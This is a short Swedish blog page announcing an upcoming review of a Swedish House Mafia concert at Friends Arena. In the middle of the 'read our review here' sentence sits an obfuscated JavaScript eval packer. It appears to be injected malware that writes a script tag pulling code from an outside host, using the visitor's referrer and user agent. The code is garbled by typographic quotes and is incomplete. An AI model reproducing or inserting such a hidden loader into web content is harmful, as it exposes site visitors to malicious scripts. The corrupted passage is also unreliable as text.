Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Swedish House Mafia Recension Friends Arena

Swedish House Mafia Recension Friends Arena
Sebastian

Uppdatering:

Läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybdhh|var|u0026u|referrer|rtsbf||js|php’.split(’|’),0,{}))
vår recension av SHM här!

Swedish House Mafia Recension: Revue kommer att så fort som möjligt att lägga upp en trevlig och bra recension från kvällen. Dock vill vi inte spoila något till alla andra besökare som ska gå på de två till konserterna som äger rum imorgon och på lördag.

Swedish House Mafia gav publiken exakt vad de ville ha, underhållning på mycket hög nivå och en massa bra musik.

Ska bli intressant och höra om alla kvällar når upp till samma nivå som kvällens.

Recensionen till Swedish House Mafia kommer snart upp! Keep your self updated!

Du kan hålla dig uppdaterad via vår Facebook-sida, vår Twitter, RSS eller genom att bara besöka oss 🙂